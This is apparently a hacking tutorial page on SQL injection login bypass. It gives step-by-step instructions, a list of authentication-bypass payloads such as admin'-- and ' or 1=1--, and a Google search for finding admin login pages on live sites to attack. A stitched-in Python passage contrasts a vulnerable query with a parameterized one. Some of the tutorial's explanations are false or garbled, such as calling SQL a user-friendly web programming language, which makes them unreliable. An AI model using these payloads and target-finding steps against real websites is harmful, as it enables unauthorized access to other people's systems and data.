SQL, often referred to as Structured Query Language, is a database computer language designed for managing data in relational database management systems (RDBMS), and originally based upon relational algebra and calculus. Its scope includes data insert, query, update and delete, schema creation and modification, and data access control.
{Wikipedia Definition}
In a nutshell, SQL is the most user-friendly web programming language, widely used and appreciated.
SQL INJECTION:
"An attack technique used to exploit web sites by altering backend SQL statements through manipulating application input."
- Web Application Security Consortium Glossary
Or, put simply, it is a way by which people can exploit the user-friendliness of the server and use it to gain access to data, etc.
Pages on SQL-backed websites are generally saved as .php, .asp or .aspx files.
SQL is simply based upon certain codes which can be exploited easily unless they are taken care of.
If you come across a SQL server, look out for the following.
First of all, you need to get to the administrator or login page of the website.
{It may take time to find one; I will explain the ways to find the admin page later.}
CHECKING FOR VULNERABILITIES:
First of all, we need to find out whether the server is vulnerable to SQL injection or not.
On the admin login page, enter a single apostrophe character in the username field, that is
'
and a single equals sign in the password field, that is
=
and press login.
If the page shows an error report like Internal Server Error or LANGUAGE NOT DEFINED, etc., then the website is vulnerable to SQL injection: the apostrophe reached the SQL statement unescaped and broke it.
Now open the source of the page {in Firefox, open the View menu and click Page Source} and look for something like
<form><input></input>
<input></input>
<input></input>
</form>
OR
SELECT * FROM members WHERE username = 'user' AND password = 'password'
Now here comes the hack exploit.
When we type a username into the username box on the main page, the script changes to "username='hellboyuser'".
Now the hack:
Go to the main page and in the username box type
admin'--
What it means:
It will change the script to "username='admin'--'".
The two dashes -- start a comment in SQL, which means IGNORE THE REST, so the script will ignore the password part.
So the query becomes
SELECT * FROM members WHERE username = 'admin'--'|||||| AND password = 'password'
This is going to log you in as the admin user, because the rest of the SQL query will be ignored.
The |||||| marks the point after which the rest of the code is ignored.
Coming back:
In the username field type admin'--, leave the password field empty, press login and you get access to the administrator page.
EXCEPTIONS:
Some website programmers know this hack, so you may need to enter multiple passwords.
E.g.:
In the username field type
admin
In the password field type
'or''='
Also try out these strings:
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
' or 1=1#
Works fantastic.
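Why these inputs change the query, and what stops them, as an added example (not code from the original page): the page's `members` login query built by string concatenation, next to the same query with bound parameters. It uses Python's sqlite3 with a constructed in-memory table; the function names and sample rows are assumptions.

```python
import sqlite3

def make_db():
    """Constructed sample data: an in-memory copy of the page's `members` table."""
    db = sqlite3.connect(":memory:")
    # Plaintext passwords only mirror the page's query; real systems store hashes.
    db.execute("CREATE TABLE members (username TEXT, password TEXT)")
    db.executemany("INSERT INTO members VALUES (?, ?)",
                   [("admin", "s3cret-admin"), ("alice", "alice-pw")])
    return db

def login_vulnerable(db, username, password):
    # Input is pasted into the SQL text, so a quote in it rewrites the statement.
    sql = ("SELECT username FROM members WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(db, username, password):
    # Placeholders bind the input as data; it is never parsed as SQL.
    sql = "SELECT username FROM members WHERE username = ? AND password = ?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

def compare(username, password):
    """Return (vulnerable_result, safe_result); 'SQL error' marks a broken statement."""
    db = make_db()
    try:
        vulnerable = login_vulnerable(db, username, password)
    except sqlite3.Error:
        vulnerable = "SQL error"
    return vulnerable, login_safe(db, username, password)

if __name__ == "__main__":
    cases = [("admin", "s3cret-admin"),  # legitimate login
             ("'", "="),                 # the page's error check
             ("admin'--", ""),           # comment cuts off the password test
             ("admin", "'or''='")]       # always-true condition in the password
    for user, pw in cases:
        print(repr(user), repr(pw), "->", compare(user, pw))
```

With bound parameters every input from the page is compared as a literal string, so the statement never breaks and no row matches.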
This hack doesn't work on all websites, and I would prefer that you not try it on any legal website.
To find the vulnerable sites, go to Google and search for
inurl:/adminlogin.asp
This search brings up the admin login pages of many websites.
Try at your own risk.
THIS PAGE IS FOR EDUCATIONAL PURPOSES ONLY.
TRY ON YOUR OWN